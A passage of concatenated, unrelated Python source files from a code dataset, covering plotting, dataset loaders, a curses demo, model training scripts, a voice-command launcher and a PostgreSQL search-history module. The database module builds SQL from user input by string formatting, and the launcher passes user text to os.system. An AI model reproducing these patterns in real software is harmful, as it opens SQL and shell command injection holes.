if(\"inrange\" in temp):\n index = temp.index(\"in\")\n if(temp[index+7] != '('):\n temp = temp[:index+7] + \"(\" + temp[index+7:]\n if(temp[-1] != \":\"):\n temp = temp + \":\"\n if(temp[-2] != \")\"):\n temp = temp[:-1] + \"):\"\n temp = \"for \"+temp[3:index] + \" in range \" + temp[index+7:]\n elif(\"in\" in temp):\n index = temp.index(\"in\")\n if(temp[-1] != \":\"):\n temp = temp + \":\"\n temp = \"for \" + temp[3:index] + \" in \" + temp[index+2:]\n return temp\n\ndef func_if(l):\n temp = l.replace(\" \",\"\")\n if(temp[-2:] != \"):\"):\n if(temp[-1] == \":\" and temp[-2] != \")\"):\n temp = temp[:-1] + \"):\"\n elif(temp[-1] != \":\" and temp[-2] == \")\"):\n temp = temp+\":\"\n else:\n temp = temp + \"):\"\n if(l.startswith(\"if\")):\n if(temp[2] != '('):\n temp = temp[:2] + \"(\"+temp[2:]\n elif(l.startswith(\"elif\")):\n if(temp[4] != '('):\n temp = temp[:4] + \"(\"+temp[4:]\n return temp\n\ndef func_else(l):\n temp = 
l.replace(\" \",\"\")\n if(temp[-1] != \":\"):\n temp = temp+\":\"\n return temp\n\ndef func_def(l):\n first_space = l.find(\" \",4)\n if(l[first_space+1] != '('):\n l.replace(\" \",\"(\",1)\n temp = l.replace(\" \",\"\")\n if(temp[0:3] == \"def\"):\n line = \"def \"+temp[3:]\n if(temp[-1] != \":\"):\n if(temp[-1] != \")\"):\n line = line + \"):\"\n elif(temp[-1] == \")\"):\n line = line + \":\"\n return line\n\ndef func_return(l):\n temp = l.replace(\" \",\"\")\n line = temp[0:6]+\" \"+temp[6:]\n line = \" \"+line\n return line\n\ndef func_print(l):\n temp = l.replace(\" \",\"\")\n word = temp[0:5]\n line = word + \" \" + temp[5:]\n if(len(line) > 6):\n if(line[6:].isalnum()):\n return line\n elif(line[6] == \"\\\"\"):\n if(line[-1] == \"\\'\"):\n line = line[:-1] + \"\\\"\"\n if(line[-1] != \"\\\"\" ):\n line = line + \"\\\"\"\n return line\n\ndef error_correction(lines):\n tab_prefix = 0\n keyword_terms = [\"for\",\"while\",\"if\",\"else\",\"def\"]\n for i in range(len(lines)):\n lines[i] = lines[i].lower()\n a = lines[i].replace(\" \",\"\")\n tab_space = \" \"\n #while loop\n if a.startswith('while'):\n lines[i] = func_while(lines[i])\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #for loop\n elif a.startswith('for'):\n lines[i] = func_for(lines[i])\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #if function\n elif a.startswith('if'):\n lines[i] = func_if(lines[i])\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #elif function\n elif a.startswith('elif'):\n lines[i] = func_if(lines[i])\n tab_prefix -= 1\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #else function\n elif a.startswith('else'):\n lines[i] = func_else(lines[i])\n tab_prefix -= 1\n if(lines[0].startswith(\"def\")):\n lines[i] = \" \"+lines[i]\n #def function\n elif a.startswith('def'):\n lines[i] = func_def(lines[i])\n #def return function\n elif a.startswith('return'):\n tab_prefix = 0\n lines[i] = func_return(lines[i])\n #print function\n elif(i != 0):\n if(a.startswith(\"print\")):\n lines[i] = func_print(lines[i])\n if(\" \" in lines[i-1]):\n index = lines[i-1].index(\" \")\n if(lines[i-1][:index] in keyword_terms):\n tab_prefix += 1\n tab=0\n while(tab < tab_prefix):\n lines[i] = \" \"+lines[i]\n tab += 1\n return lines\n\ndef has_operator(line):\n # recognizes operator sanitizes operands, returns line (else return line)\n pass\n\ndef has_fun_call(line):\n # recognizes function call sanitizes parameters, returns line (else return line)\n pass\n","sub_path":"VizCode-Server/errorCorrection.py","file_name":"errorCorrection.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442291419","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport oned_consolidation as oc\n\nres_file_name = \"..\\\\Build\\\\Tests\\\\res_file\\\\TimeHistory1-test_out1.txt\"\n#res_file_name = \"..\\\\Build\\\\Tests\\\\res_file\\\\TimeHistory1-test_out1 - mixed.txt\"\n#res_file_name = \"..\\\\Build\\\\Tests\\\\res_file\\\\TimeHistory1-test_out1 - standard.txt\"\n\nscript_dir = os.path.dirname(os.path.realpath('__file__')) #<-- absolute dir the script is in\nabs_file_path = os.path.join(script_dir + \"\\\\\", res_file_name)\n\nfig = plt.figure()\nplot1 = fig.subplots(1, 1)\nplot1.set_xlabel(\"Time (s)\")\nplot1.set_ylabel(\"Settlement (m)\")\n\n#######################################################################################\nx_data = [];\ny_data = 
[];\ntime = 0.0\nz = 0.0 # position\nfield_value = 0.0\noutput_pcl_num = 0\nis_init = False\nwith open(abs_file_path, 'r') as res_file:\n while True:\n # time record\n line_text = res_file.readline()\n if not line_text:\n break\n if (\"TotalTime\" in line_text):\n data_start_pos = line_text.find(\"=\") + 1\n time = float(line_text[data_start_pos:-1])\n x_data.append(time)\n elif (\"PointNum\" in line_text):\n data_start_pos = line_text.find(\"=\") + 1\n output_pcl_num = int(line_text[data_start_pos:-1])\n elif (\"*FieldData\" in line_text):\n for i in range(output_pcl_num):\n line_text = res_file.readline()\n line_data = list(map(lambda x: float(x.strip('\\n')), line_text.split(',')))\n if i == output_pcl_num - 1: # particle on top\n field_value = line_data[1] # y\n if not is_init:\n z = line_data[1] # position\n is_init = True\n field_value -= z\n y_data.append(field_value)\n\nline1, = plot1.plot(x_data, y_data)\n\n#################################################################################################\nE = 1000.0\nniu = 0.25 # possion ratio\nEs = (1 - niu) / (1 + niu) / (1 - 2.0*niu) * E # Es = (1-v) / (1 + v) / (1-2v) * E\nkv = 1.0e-4\nmiu = 1.0 # dynamic viscosity\nCv = kv * Es / miu\nu0 = 100.0\nH = 1.0\ncon_res = oc.OneDConsolidation(Cv, Es, u0, H)\n\ntime = 30.0 # time of consolidation\ndata_num = 100\nt_list = np.zeros(data_num + 2)\nu_list = np.zeros(data_num + 2)\nt_list[0] = 0.0\nu_list[0] = 0.0\nt_list[1] = 0.0 # time for equilibrium\nu_list[1] = u_list[0]\nfor i in range(data_num):\n t_list[i + 2] = time * float(i) / float(data_num)\n u_list[i + 2] = con_res.calSettlement(t_list[i + 2])\n t_list[i + 2] += t_list[1]\n\nline2, = plot1.plot(t_list, u_list, 'r--')\n\nplt.legend(handles=[line1,line2], labels=['Explicit MPM', 'Analytical Solution'])\n\nplt.show()\n#plt.savefig('ut - 100 - 2e-5.png')\n\n#os.system(\"pause\")\n","sub_path":"PyUtilities/u_display_2D.py","file_name":"u_display_2D.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82025966","text":"import xml.etree.ElementTree as ET\nimport numpy as np\nfrom torchstat import stat\nfrom nets.CSPdarknet import *\n# D:\\datasets\\voc\\VOCtrainval_06-Nov-2007\\VOCdevkit\\VOC2007\\JPEGImages\\000005.jpg 263,211,324,339,8 165,264,253,372,8 241,194,295,299,8\ndef get_image_annotation(label_path):\n label_list = []\n with open(label_path) as f:\n for line in f.readlines():\n splited_by_space = line.split(' ')\n image_path = splited_by_space[0]\n image_label_dict = {}\n for item in splited_by_space[1:]:\n image_label_dict[image_path] = item\n label_list.append(image_label_dict)\n image_label_dict ={}\n return label_list\n\ndef get_net_stat(model):\n stat(model,(3,608,608))\n\nif __name__ == '__main__':\n x = get_image_annotation('D:\\\\PyCharmSpace\\\\kan\\\\kansgitrepo\\\\yolov4-pytorch\\\\2007_train.txt')\n print(x)\n net = darknet53(False)\n get_net_stat(net)\n\n\n\n\n\n","sub_path":"yolov4-pytorch/model_prune/prune_utils.py","file_name":"prune_utils.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610141678","text":"import tflearn.datasets.oxflower17 as oxflower17\nimport numpy\nclass Dataset():\n def __init__(self):\n self._index_in_epoch = 0\n self._epochs_completed = 0\n def read_data(self):\n m=0\n n=0\n X, Y = oxflower17.load_data(one_hot=True)\n self.train_data = numpy.zeros([935,224,224,3],dtype=\"float32\")\n 
self.train_label = numpy.zeros([935,17],dtype=\"float32\")\n self.validate_data = numpy.zeros([425,224,224,3],dtype=\"float32\")\n self.validate_label = numpy.zeros([425,17],dtype=\"float32\")\n\n for i in range(0,1360):\n if i % 80 < 55:\n numpy.copyto(self.train_data[m],X[i])\n numpy.copyto(self.train_label[m],Y[i])\n m += 1\n else:\n self.validate_data[n] = numpy.copy(X[i])\n self.validate_label[n] = numpy.copy(Y[i])\n n += 1\n self._num_examples = self.train_data.shape[0]\n return self.train_data,self.train_label,self.validate_data,self.validate_label\n\n def next_batch(self,batch_size):\n start = self._index_in_epoch\n self._index_in_epoch += batch_size\n if self._index_in_epoch > self._num_examples:\n # Finished epoch\n self._epochs_completed += 1\n # Shuffle the data\n perm = numpy.arange(self._num_examples,dtype=\"int32\")\n numpy.random.shuffle(perm)\n self.train_data = self.train_data[perm]\n self.train_label = self.train_label[perm]\n start = 0\n self._index_in_epoch = batch_size\n assert batch_size <= self._num_examples\n end = self._index_in_epoch\n return self.train_data[start:end],self.train_label[start:end]\n\n\n","sub_path":"oxflowers_16M/oxflower17.py","file_name":"oxflower17.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"386361479","text":"#!/usr/bin/python3\n\nimport os\nfrom subprocess import Popen\nimport re\n\nclass Commands:\n def __init__(self):\n self.erase_history = False\n self.use_async = False\n self.print_to_screen = False\n\n self.url_search = 'https://www.google.com/search?q='\n self.url_youtube = 'https://www.youtube.com/results?search_query='\n self.launch_google_chrome = 'google-chrome --app='\n self.launch_firefox = 'firefox --search '\n self.launch_rhythmbox = 'rhythmbox '\n self.launch_mail = 'thunderbird'\n self.launch_office = 'libreoffice'\n self.launch_file = 'nautilus'\n self.launch_terminal = 'gnome-terminal'\n\n self.text_commands = {\n 'play': 'any',\n 'media': 'any',\n 'google': 'search',\n 'search': 'search',\n 'song': 'music',\n 'video': 'video',\n 'movie': 'video',\n 'music': 'music',\n 'youtube': 'video',\n 'mail': 'mail',\n 'letter':'mail',\n 'letters':'mail',\n 'email': 'mail',\n 'emails':'mail',\n 'thunderbird':'mail',\n 'office': 'office',\n 'libreoffice': 'office',\n 'file':'file',\n 'files': 'file',\n 'directory': 'file',\n 'directories': 'file',\n 'terminal': 'terminal',\n 'firefox': 'firefox'\n }\n\n self.command_dict = {\n 'search': self.launch_google_chrome + self.url_search,\n 'video': self.launch_google_chrome + self.url_youtube,\n 'music': self.launch_rhythmbox,\n 'mail': self.launch_mail,\n 'office': self.launch_office,\n 'file': self.launch_file,\n 'terminal': self.launch_terminal,\n 'firefox': self.launch_firefox\n }\n self.command_string = ''\n\n self.p = None\n\n def re(self,i):\n return re.sub('[.?!:;,]','', i)\n\n def is_command(self,i):\n i = self.re(i)\n output = False\n for x in i.split():\n for xx in self.text_commands:\n if x.strip().lower() == xx.strip().lower():\n output = True\n return output\n\n def strip_command(self,i):\n i = self.re(i)\n i = i.split()\n ii = i[:]\n for x in i:\n for xx in self.text_commands:\n if x.strip().lower() == xx.strip().lower():\n ii.remove(x)\n return ii\n\n\n def decide_commmand(self,i):\n i = self.re(i)\n chosen = {}\n any = False\n for xx in self.text_commands.values():\n if self.print_to_screen: print(xx,'xx')\n chosen[xx] = 0\n output = False\n i = i.split()\n ii = i[:]\n if 
self.print_to_screen:\n print(self.text_commands)\n print(chosen)\n for x in i:\n for xx in self.text_commands:\n\n if x.strip().lower() == xx.strip().lower() : #and x.strip().lower() in self.text_commands:\n output = True\n if self.text_commands[xx] in chosen:\n chosen[self.text_commands[xx]] += 1\n ii.remove(x)\n if self.print_to_screen: print(chosen[self.text_commands[xx]], xx, x)\n i = ii\n #if self.print_to_screen: print(chosen)\n if self.command_string == '':\n\n high = 0\n old_high = 0\n for x in chosen:\n high = chosen[x]\n if high > old_high and x != 'any':\n self.command_string = self.command_dict[x]\n old_high = high\n elif high > old_high and x == 'any':\n any = True\n\n if self.print_to_screen: print(chosen)\n\n if self.command_string == '' and any is True:\n self.command_string = self.command_dict['search']\n\n if (\n self.command_string == self.command_dict['video'] or\n self.command_string == self.command_dict['search'] or\n self.command_string == self.command_dict['firefox']\n ):\n self.command_string += '+'.join(i)\n return output\n\n def do_command(self, i):\n erase = False\n self.command_string = ''\n if isinstance(i,list): i = ' '.join(i)\n i = self.re(i)\n\n #if len(self.command_string) == 0:\n self.decide_commmand(i)\n\n if self.print_to_screen: print(self.command_string)\n\n if not self.use_async:\n self.launch_sync(self.command_string)\n else:\n self.launch_async(self.command_string)\n\n if self.erase_history:\n erase = True\n return erase\n\n def launch_sync(self,i):\n ## if the program doesn't exist, this command will fail but chatbot will continue.\n os.system(i)\n pass\n\n def launch_async(self, i):\n i = i.split()\n self.p = Popen(i)\n pass\n\nif __name__ == '__main__':\n c = Commands()\n command1 = 'play media'\n command2 = 'play music like video music like a movie of the music band youtube.'\n c.print_to_screen = True\n z = c.is_command(command1)\n for x in range(2):\n if len(c.strip_command(command1)) > 0:\n #command = c.strip_command(command)\n print(command1, x, 'here1')\n c.do_command(command1)\n exit()\n elif x is 1:\n #command = c.strip_command(command)\n print(command2, x, 'here2')\n c.do_command(command2)\n print('use previous command also.')\n pass\n","sub_path":"model/nmt_commands.py","file_name":"nmt_commands.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598897455","text":"def find(a,b):\r\n s=a+b\r\n p=a*b\r\n r=a/b\r\n return s,p,r\r\na=int(input(\"Enter First No. : \"))\r\nb=int(input(\"Enter Second No. 
: \"))\r\ns,p,r=find(a,b)\r\nprint(s)\r\nprint(p)\r\nprint(r)\r\n","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309554485","text":"#!/usr/bin/env python\n \nimport curses\nimport curses.textpad\nimport curses.panel\n# import time\n\ndef main(stdscr):\n \"\"\"\n \"\"\"\n curses.curs_set(0)\n\n stdscr.border() # Draw border\n \n def row(set=-1, r=[0]): # A typle of overload\n \"\"\"\n \"\"\"\n if set == -1:\n r[0] = r[0] + 1\n elif set > -1:\n r[0] = set\n return r[0]\n\n # Text attributes\n stdscr.addstr(row(),1, 'ALTCHARSET', curses.A_ALTCHARSET)\n stdscr.addstr(row(),1, 'BLINK', curses.A_BLINK) # no working\n stdscr.addstr(row(),1, 'BLOD', curses.A_BOLD)\n stdscr.addstr(row(),1, 'DIM', curses.A_DIM) # no working\n stdscr.addstr(row(),1, 'NORMAL', curses.A_NORMAL)\n stdscr.addstr(row(),1, 'REVERSE', curses.A_REVERSE)\n stdscr.addstr(row(),1, 'STANDOUT', curses.A_STANDOUT) # same as REVERSE\n stdscr.addstr(row(),1, 'UNDERLINE', curses.A_UNDERLINE)\n\n # Font frontground and background color. Color is brighter on BOLD, and black BLOD is gray. \n col = (curses.COLOR_BLACK,\n curses.COLOR_RED,\n curses.COLOR_GREEN,\n curses.COLOR_YELLOW,\n curses.COLOR_BLUE,\n curses.COLOR_MAGENTA,\n curses.COLOR_CYAN,\n curses.COLOR_WHITE)\n r = row()\n for color in col:\n curses.init_pair(color+1, color, 0)\n stdscr.addstr(r,1+color*2, 'HI', curses.color_pair(color+1) | curses.A_BOLD)\n\n r = row()\n for color in col:\n stdscr.addstr(r,1+color*2, 'HI', curses.color_pair(color+1))\n\n # The only way to set bright backgound color\n r = row()\n for color in col:\n stdscr.addstr(r,1+color*2, ' ', curses.color_pair(color+1) | curses.A_BOLD | curses.A_REVERSE)\n\n r = row()\n for color in col:\n stdscr.addstr(r, 1+color*2, ' ', curses.color_pair(color+1) | curses.A_REVERSE)\n\n stdscr.move(15, 1)\n for acs in (curses.ACS_BLOCK,\n curses.ACS_BOARD,\n curses.ACS_BTEE,\n curses.ACS_BULLET,\n curses.ACS_CKBOARD,\n curses.ACS_DARROW,\n curses.ACS_DEGREE,\n curses.ACS_DIAMOND,\n curses.ACS_GEQUAL,\n curses.ACS_HLINE,\n curses.ACS_LANTERN,\n curses.ACS_LARROW,\n curses.ACS_LEQUAL,\n curses.ACS_LLCORNER,\n curses.ACS_LRCORNER,\n curses.ACS_LTEE,\n curses.ACS_NEQUAL,\n curses.ACS_PI,\n curses.ACS_PLMINUS,\n curses.ACS_PLUS,\n curses.ACS_RARROW,\n curses.ACS_RTEE,\n curses.ACS_S1,\n curses.ACS_S3,\n curses.ACS_S7,\n curses.ACS_S9,\n curses.ACS_STERLING,\n curses.ACS_TTEE,\n curses.ACS_UARROW,\n curses.ACS_ULCORNER,\n curses.ACS_URCORNER,\n curses.ACS_VLINE):\n stdscr.addch(acs)\n stdscr.addch(' ')\n\n # Set attribute for following write\n stdscr.attrset(curses.A_UNDERLINE)\n stdscr.addstr(row(16),1, \"BLOD\", curses.A_BOLD)\n stdscr.addstr(row(),1, \"UNDERLINE\")\n stdscr.attroff(curses.A_UNDERLINE)\n stdscr.addstr(row(),1, \"NONE\")\n\n stdscr.hline(curses.ACS_HLINE, 10) # insert line of ch\n stdscr.chgat(18,2, 1, curses.color_pair(2)) # Set character attribute.\n stdscr.insstr('*') # insert ch\n stdscr.instr() # get a string\n stdscr.vline(curses.ACS_VLINE, 3) # insert line of ch\n\n\n # stdscr.clear() # clear window.\n # stdscr.clrtobot() # Erase from cursor to the end of window.\n # stdscr.clrtoeol() # Erase from cursor to the end of the line.\n # stdscr.delch() # Delete any character at (y, x).\n # stdscr.deleteln() # Delete the line under the cursor.\n # stdscr.getbegyx() # Return a tuple (y, x) of co-ordinates of upper-left corner.\n # stdscr.getmaxyx() # Return a tuple (y, x) of 
the height and width of the window.\n # stdscr.is_wintouched() # Return True if the specified window was modified since the last call to refresh().\n\n # stdscr.addstr(\"{}\\n\".format(repr(col)))\n\n win = curses.newwin(4,5,1,30)\n win.border()\n sbwin = win.subwin(2,30) # Create a sub-window\n sbwin.border(0, 0, 0, 0, curses.ACS_LTEE, curses.ACS_RTEE, 0, 0)\n pad = curses.newpad(100, 100)\n pad.border()\n bgray = curses.A_REVERSE \n pad.bkgd(' ', bgray) # set background, default to all string\n # These loops fill the pad with letters; this is\n # explained in the next section\n for y in range(0, 100):\n for x in range(0, 100):\n try:\n pad.addch(y,x, ord('a') + (x*x+y*y) % 26)\n except curses.error:\n pass\n\n # Displays a section of the pad in the middle of the screen\n # stdscr.refresh()\n # win.refresh()\n\n textwin = curses.newwin(1, 8, 20, 20)\n textwin.bkgd(' ', curses.A_UNDERLINE)\n tb = curses.textpad.Textbox(textwin)\n\n w2 = curses.newwin(5,5, 1,40)\n w2.border()\n\n p1 = curses.panel.new_panel(stdscr)\n p2 = curses.panel.new_panel(w2)\n p3 = curses.panel.new_panel(win)\n # p4 = curses.panel.new_panel(pad)\n\n curses.panel.update_panels()\n curses.doupdate()\n # pad.refresh(20,20, 5,35, 10,40)\n\n\n while True:\n ch = stdscr.getch()\n if ch == ord('q'): break\n elif ch == curses.KEY_RIGHT:\n y = win.getbegyx()[0]\n x = win.getbegyx()[1] + 1\n if x < stdscr.getmaxyx()[1]-win.getmaxyx()[1]:\n win.mvwin(y, x)\n stdscr.redrawwin() \n curses.panel.update_panels()\n curses.doupdate()\n pad.refresh(20,20, 5,35, 10,40)\n elif ch == curses.KEY_LEFT:\n yx = list(win.getbegyx())\n yx[1] -= 1\n if yx[1] > 0:\n win.mvwin(*yx)\n stdscr.redrawwin() \n curses.panel.update_panels()\n curses.doupdate()\n pad.refresh(20,20, 5,35, 10,40)\n elif ch == ord('e'):\n curses.curs_set(2)\n text = tb.edit()\n sbwin.addstr(1,1, text)\n sbwin.refresh()\n curses.curs_set(0)\n\ncurses.wrapper(main)\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"182592677","text":"### Main file for the training/predition of the LSTM and Temporal net over the trajectories dataset.\n\nimport argparse\nimport shutil\nimport numpy as np\nimport time\n\nfrom ball_3d_coordinates.traj_flying_experiments.preprocessing.data_preprocessing_traj import TmpTrajPreprocessor\nfrom ball_3d_coordinates.traj_flying_experiments.preprocessing.exploration import Visualizer\nfrom ball_3d_coordinates.traj_flying_experiments.preprocessing.data_loader_traj import Loader\nfrom ball_3d_coordinates.traj_flying_experiments.models.tmp_net_traj import TmpTrajNet\nfrom ball_3d_coordinates.traj_flying_experiments.models.lstm_traj import LSTMTrajNet\n\nparser = argparse.ArgumentParser()\n\n\"\"\" General Parameters \"\"\"\nparser.add_argument('--restore', type=bool, default=False, \n help='if True restore the model from --model_path.')\nparser.add_argument('--train', type=bool, default=False, \n help='if True train the model.')\nparser.add_argument('--tune', type=bool, default=False, \n help='if True tune the model.')\nparser.add_argument('--test', type=bool, default=False, \n help='if True test the model.')\n\n\"\"\" Model Parameters \"\"\"\nparser.add_argument('--log_dir', type=str, default='./tensorbaord', \n help='directory where to store tensorbaord values.')\nparser.add_argument('--epochs', type=int, default=1000, \n help='number of batch iterations.')\nparser.add_argument('--batch_size', type=int, default=100, 
\n help='number of samples in the training batch.')\nparser.add_argument('--input_trace', type=int, default=25, \n help='dimension of the trace to take into account.')\nparser.add_argument('--noise', type=bool, default=False, \n help='if True, a noise is applied to the features.')\n\nargs = parser.parse_args()\n\ndef main():\n\n # Remove tensorboard folder.\n try:\n shutil.rmtree('./tensorbaord')\n except FileNotFoundError:\n pass\n\n # Fix the seed\n np.random.seed(0)\n \n # Load the data\n loader = Loader()\n X, y = loader.load_data()\n\n # Explore data\n Visualizer.get_statistics(X, y)\n\n # Preprocess the data\n preprocessor = TmpTrajPreprocessor(input_trace=args.input_trace)\n X_train, y_train, X_test, y_test, X_val, y_val = preprocessor.fit_transform(X, y, noise=args.noise)\n\n print(X_train.shape)\n print(X_test.shape)\n print(X_val.shape)\n\n # Define the Model\n model = TmpTrajNet(\n input_trace=args.input_trace,\n batch_size=args.batch_size,\n epochs=args.epochs,\n log_dir=args.log_dir\n )\n\n # Restore the model\n if args.restore == True:\n model.restore()\n\n # Train the model\n if args.train == True:\n print(\"Starting training...\")\n history = model.fit(X_train, y_train, X_test, y_test)\n print(\"Finished training...\")\n\n # Tune the model\n if args.tune == True:\n print(\"Starting tuning...\")\n model.tune(X_train, y_train)\n print(\"Finished tuning...\")\n\n # Test the model\n if args.test == True:\n print(\"Starting testing...\")\n loss, metric = model.evaluate(X_test, y_test)\n print(\"Finished testing...\")\n print(\"LOSS: \", loss)\n print(\"MAE: \", metric)\n \n # Measuring Prediction Time\n sample = np.reshape(X_train[0], (1, 25, 3))\n start = time.clock()\n model.predict(sample)\n print(time.clock() - start)\n\n return\n\nmain()","sub_path":"main_traj_synthetic.py","file_name":"main_traj_synthetic.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237115963","text":"###########################################################################\n# This the database file for connecting to #\n# database. 
PostgresSQL is being used along with #\n# #\n# psycopg2: python module for interacting with #\n# PostgresSQL #\n# #\n# Database Schema: #\n# Databse Name: search_history #\n# ---------------------------------------------------------------------- #\n# |(user_id varchar(256) | keyword varchar(256) | search_time timestamp)| #\n# ---------------------------------------------------------------------- #\n###########################################################################\n\nimport psycopg2\nimport os\nfrom dotenv import load_dotenv\nfrom datetime import datetime\n\nload_dotenv() # loads values from env file\n\nDATABASE_URL = os.environ['DATABASE_URL']\n\ndef create_db_connection():\n conn = psycopg2.connect(host='ec2-34-204-121-199.compute-1.amazonaws.com',\n port=5432,\n user=os.getenv('DB_USER'),\n password=os.getenv('DB_PASS'),\n database='dfgi7dou33g0p5',\n sslmode='allow'\n )\n return conn\n\n\ndef post_search_data(user_id, keyword):\n connection = create_db_connection()\n sql_cursor = connection.cursor()\n\n # adding timestamp so that I can get same query saved to the database\n sql_cursor.execute(\"INSERT INTO public.search_history VALUES('{}', '{}', '{}')\".format(\n user_id, keyword, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\n connection.commit()\n connection.close()\n\n\ndef get_search_data(user_id, keyword):\n connection = create_db_connection()\n sql_cursor = connection.cursor()\n\n # getting search history for the keyword\n sql_cursor.execute(\n \"SELECT * FROM public.search_history WHERE user_id = '{}' AND keyword LIKE '%\".format(user_id) + keyword + \"%'\")\n\n results = sql_cursor.fetchall()\n connection.close()\n\n return results\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252478238","text":"def binarySearch(array, target):\n # Write your code here.\n left = 0\n right = len(array)-1\n mid = 0\n while left <= right:\n mid = (left + right)//2\n match = array[mid]\n if match == target:\n return mid\n elif target < match:\n right = mid-1\n else:\n left = mid+1\n return -1\n","sub_path":"AlgoExpert/binarySearch/itaretive.py","file_name":"itaretive.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"49622072","text":"from django.db import models\nfrom django.contrib.admin.filterspecs import FilterSpec, ChoicesFilterSpec\nfrom django.utils.encoding import smart_unicode\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.sites.models import Site\n\nclass MultiSitesFilterSpec(FilterSpec):\n\tdef __init__(self, f, request, params, model, model_admin):\n\t\tsuper(MultiSitesFilterSpec, self).__init__(f, request, params, model, model_admin)\n\t\tself.lookup_val = request.GET.get(f.name, None)\n\t\tself.lookup_choices = Site.objects.all()\n\n\tdef title(self):\n\t\treturn \"sites\"\n\t\t\n\tdef choices(self, cl):\n\t\tyield {'selected': self.lookup_val is None,\n\t\t\t\t'query_string': cl.get_query_string({}, [self.field.name]),\n\t\t\t\t'display': _('All')}\n\n\t\tfor site in self.lookup_choices:\n\t\t\tyield {'selected': self.lookup_val == site,\n\t\t\t\t\t'query_string': cl.get_query_string({'sites__id': site.id}),\n\t\t\t\t\t'display': 
site}\n","sub_path":"admin/filterspecs.py","file_name":"filterspecs.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584666676","text":"import math\n\nmonth_dict = {\n 1: 31,\n 2: 28,\n 3: 31,\n 4: 30,\n 5: 31,\n 6: 30,\n 7: 31,\n 8: 31,\n 9: 30,\n 10: 31,\n 11: 30,\n 12: 31\n}\nsundaysCount = 0\ndayofweek = 2\nday = 1\nyear = 1901\nmonth = 1\nleap = False\n\nwhile year < 2001:\n\n if day == 1 and dayofweek == 7:\n sundaysCount += 1\n\n day += 1\n dayofweek += 1\n\n if dayofweek > 7:\n dayofweek = 1\n if leap and month == 2:\n if day > month_dict[month] + 1:\n day = 1\n month += 1\n else:\n if day > month_dict[month]:\n day = 1\n month += 1\n\n if month > 12:\n year += 1\n month = 1\n if year % 4 == 0:\n leap = True\n else:\n leap = False\n\n # iterate everything\n # iterate day, day of the week\n # if day greater than month day, iterate month and day back to 1\n # if leapyear andmonth 2 add 1 to total\n # if month is 12 then iterate year and month = 1 day = 1\n\n\nprint(sundaysCount)\n","sub_path":"python/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"332823057","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport json\nfrom Public.ReadConfig import ReadConfig\n\nproDir = os.path.split(os.path.realpath(__file__))[0]\n#将path分割成路径名和文件名\ndata_path = os.path.join(proDir, \"data.json\")\n\n\ndef generate_test_data(devices):\n dict_tmp = {}\n for d in devices:\n print(devices.index(d))\n dict_tmp[d['serial']] = {}\n dict_tmp[d['serial']]['user_name'] = ReadConfig().get_testdata('user_name')[devices.index(d)]\n dict_tmp[d['serial']]['password'] = ReadConfig().get_testdata('password')[devices.index(d)]\n dict_tmp[d['serial']]['message'] = ReadConfig().get_message('message')[devices.index(d)]\n dict_tmp[d['serial']]['num'] = ReadConfig().get_num('num')[devices.index(d)]\n print(dict_tmp)\n print(os.path.abspath('.'))\n with open(data_path, \"w\") as f:\n json.dump(dict_tmp, f)\n f.close()\n print(\"测试数据data.js创建完成\")\ndef get_test_data(d):\n with open(data_path, 'r') as f:\n data = json.load(f)\n return data[d.device_info['serial']]","sub_path":"Public/TestData.py","file_name":"TestData.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"159329655","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom mysite.envconfig import get_judge_pw\n\nimport csv\nimport os\n\n\ndef readOneFile(fpath):\n with open(fpath) as f:\n reader = csv.DictReader(f)\n for line in reader:\n un = line[\"username\"].strip()\n if not un:\n raise ValueError(\"Empty username. 
